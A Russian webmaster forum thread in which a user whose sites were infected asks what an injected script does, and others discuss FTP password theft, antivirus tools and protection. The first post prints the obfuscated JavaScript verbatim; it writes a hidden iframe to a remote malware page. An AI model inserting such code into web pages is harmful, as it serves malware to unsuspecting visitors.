- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Сегодня утром по почте пришло сообщение с фрихоста на народе что якобы на на одном из моих сайтов (который я делал бог знает когда и собственно про него забыл) был отключен сайт по причине наличия вируса на нем.
Начал смотреть через CuteFTP 7 Professional обнаружил на главных страницах (в коде) многих сайтов (не всех) вот такую вставку, причем на некоторых сайтах вместо всего кода стоит эта хрень, тобиж заменила своим кодом всю главную страницу, заражается только главная страница:
<!-- o4 --><script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062';
s+='060073070082065077069032115114099061034104116116112058047047115105109111099114111103103101114046119';
s=s+'115047102108097115104047105110100101120046112104112034032119105100116104061053032104101105103104116';
s=s+'061053032115116121108101061034100105115112108097121058110111110101034062060047073070082065077069062';
s=s+'032';
t='';l=s.length;i=0; while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();</script>
<!-- c4 -->
хосты у меня на всех этих сайтах разные т.е. вариант что это на хостинге отметается. Значит через меня. На компе нод 32 лицензия стоит, и ничего... Перед тем как менять пароли и антивирь интересно узнать что эта хрень делает? Может кто сталкивался ?
Да кстати вот письмо с фрихоста :
Здравствуйте, Алексей!
/index.htm : infected with Trojan.DownLoader.28150
Сейчас доступ к сайту по http закрыт, но доступ через мастерскую и по FTP возможен. Свяжитесь со службой поддержки Народ.Ру
для выяснения/уточнения причины закрытия Вашего сайта.
Просим Вас обратить внимание, что, если Вы не предприняли никаких действий по решению возникшей проблемы, закрытый сайт удаляется автоматически через месяц с момента закрытия и восстановлению не подлежит.
С уважением,
Служба поддержки Яндекса
Вы не одиноки - http://forum.woweb.ru/index.php?s=&act=ST&f=9&t=29494
http://forum.antichat.ru/thread40731.html
aleks8897, Это Вас по ФТП заразили. Вылечите компьютер, а потом смените все пароли на ФТП.
Ява скрипт всего лишь собирает ссылку на страницу, откуда загружается вирусняк.
aleks8897, Это Вас по ФТП заразили. Вылечите компьютер, а потом смените все пароли на ФТП.
Ява скрипт всего лишь собирает ссылку на страницу, откуда загружается вирусняк.
какой антивирь словит эту гадость ? Нод 32 не ловит судя по всему
aleks8897, странно-НОД хорошая вещь...особенно если ещё и лицензионный😆
У него очень хорошо с червями получается, в отличие от Касперского-который в вообще "вразнос" пошёл.
...В последнее время такая фигня что-то набирает обороты: у меня полгода назад сидел вирусяка, который внедрялся в почту Аутлука .То есть я его не вижу когда письмо отправляю, а получатель читает в письме ссылку типа "тут хороший стих, но немного грустный"🙄
...и при чём эта зараза ухитрялась влазить в окно редактирования сайта в WSYWG редакторе сайтов, то есть прописывалась скриптом (!) в теле веб-страницы.
Мне единственное, что помогло-это, извините, переустановка Винды.И только в третий 😆 раз я поставил НОД и больше таких проблем не знал.
..а Касперскому хоть бы хны было.
Кажется касперский определяет его
Модификации вирусов появляются регулярно, и обновление может не поспевать. У меня был аналогичный случай (то же CutеFTP,хотя говорят воруют от разных). Касперский,дрВеб,Нод32 ни до ни после заражения ничего не нашел. Пришлось ставить фаервол (КИС, Comodo) и надеяться на него. Помимо этого теперь завожу отдельные ФТП аккаунты для доступа к сайту (чтобы в последствие не менять целиком пароли на CPanel). И еще ловушка: скрипт по крону проверяет размер определенного файла (например index.html -который не обновляется), и если его размер изменится, на почту летит сообщение (хотя бы успеть вычистить до заражения других).
norton Antivirus c последним обновленим вплоть до сегодняшнего дня.
И поставьте себе Фаер хороший.
БУквально недавно поймал червя.. кряк искал :(
Антивирус словил, но не успел предотвратить (Я как раз не успел его обновить).. А фаер сказал, что рабочая облась интернет эксплорера была изменена, что типа закрывает доступ...
А вот если фаера небыло... улетили бы все мои пароли... и wm..и...
какой антивирь словит эту гадость ? Нод 32 не ловит судя по всему
Антивирусы не дают 100% гарантию, ставьте фаервол, рекомендуется откдючить через фаер и в браузерах JS, и ActiveX + скрытые фреймы - IFRAME и не пользуйтесь IE.
100% защиты это не дает но возможность заражения снижает значительно.
И не храните пароли в ФТП да и вообще где либо.
и не пользуйтесь IE.
Лиса тоже теперь не образец надежности, что и было вопросом времени, как только он получил распространение, тем больше привлек к себе внимания. По поводу фаера полностью согласен. Порой только он может помочь, но опять таки и фаеры обходят :(.
Я уже говорил - оптимально для работы с паролями на виртуальной машине или винду или линукс попроще и с этой машины только работать - никаких сайтов не посещать, про порно и варез вообще молчу. Только работа с кошельками и FTP.
Сегодня тоже все сайты были поражены чем-то подобным. Пока пароли не поменял от ФТП замена файлов на нормальные была напрасной, все восстанавливалось. Сейчас вроде все ОК. Хранил пароли в Total Commander.
Есть ли удобный ФТП клиент где можно надежно пароли можно хранить?
Совет "не хранить нигде" не пойдет, паролей много.